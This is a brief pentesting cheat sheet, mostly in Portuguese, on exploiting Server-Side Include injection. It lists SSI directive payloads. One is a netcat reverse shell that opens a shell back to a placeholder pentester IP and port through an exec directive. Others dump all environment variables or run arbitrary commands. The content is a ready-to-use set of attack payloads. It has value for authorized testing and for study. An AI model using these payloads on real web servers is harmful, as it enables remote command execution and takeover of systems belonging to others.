# SSI Injection Exploitation Example

As inclusões do lado do servidor ( `SSI`) são uma tecnologia usada por aplicativos da Web para criar conteúdo dinâmico em páginas HTML antes do carregamento ou durante o processo de renderização, avaliando as diretivas SSI.

| **Carga útil da diretiva SSI**                                                                              | **Descrição**      |
| ----------------------------------------------------------------------------------------------------------- | ------------------ |
| `<!--#echo var="DATE_LOCAL" -->`                                                                            | Data               |
| `<!--#printenv -->`                                                                                         | Todas as variáveis |
| `<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo\|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->` | reverse shell      |

Algumas outras diretivas SSI são:

```html
// Modification date of a file
<!--#flastmod file="index.html" -->

// CGI Program results
<!--#include virtual="/cgi-bin/counter.pl" -->

// Including a footer
<!--#include virtual="/footer.html" -->

// Executing commands
<!--#exec cmd="ls" -->

// Setting variables
<!--#set var="name" value="Rich" -->

// Including virtual files (same directory)
<!--#include virtual="file_to_include.html" -->

// Including files (same directory)
<!--#include file="file_to_include.html" -->
```